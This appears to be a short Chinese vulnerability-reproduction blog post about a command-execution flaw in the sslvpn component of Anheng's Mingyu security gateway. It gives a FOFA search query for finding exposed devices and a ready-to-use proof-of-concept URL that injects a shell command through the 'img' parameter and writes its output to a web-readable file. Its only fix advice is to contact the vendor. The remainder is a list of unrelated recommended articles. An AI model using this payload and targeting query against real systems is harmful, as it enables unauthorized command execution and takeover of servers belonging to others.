【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
大丈夫立于天地间13 小时前
ISIS协议中的数据库同步
运维·网络·信息与通信
Dream Algorithm13 小时前
路由器的 WAN(广域网)口 和 LAN(局域网)口
网络·智能路由器
IT猿手13 小时前
基于CNN-LSTM的深度Q网络(Deep Q-Network,DQN)求解移动机器人路径规划,MATLAB代码
网络·cnn·lstm
吴盐煮_13 小时前
使用UDP建立连接,会存在什么问题?
网络·网络协议·udp
hyshhhh14 小时前
【算法岗面试题】深度学习中如何防止过拟合?
网络·人工智能·深度学习·神经网络·算法·计算机视觉
币之互联万物14 小时前
AQUA爱克泳池设备入驻济南校园,以品质筑牢游泳教育安全防线
安全
Hellc00714 小时前
轮询、WebSocket 和 SSE:实时通信技术全面指南(含C#实现)
网络
xujiangyan_15 小时前
nginx的反向代理和负载均衡
服务器·网络·nginx
GalaxyPokemon15 小时前
Muduo网络库实现 [十] - EventLoopThreadPool模块
linux·服务器·网络·c++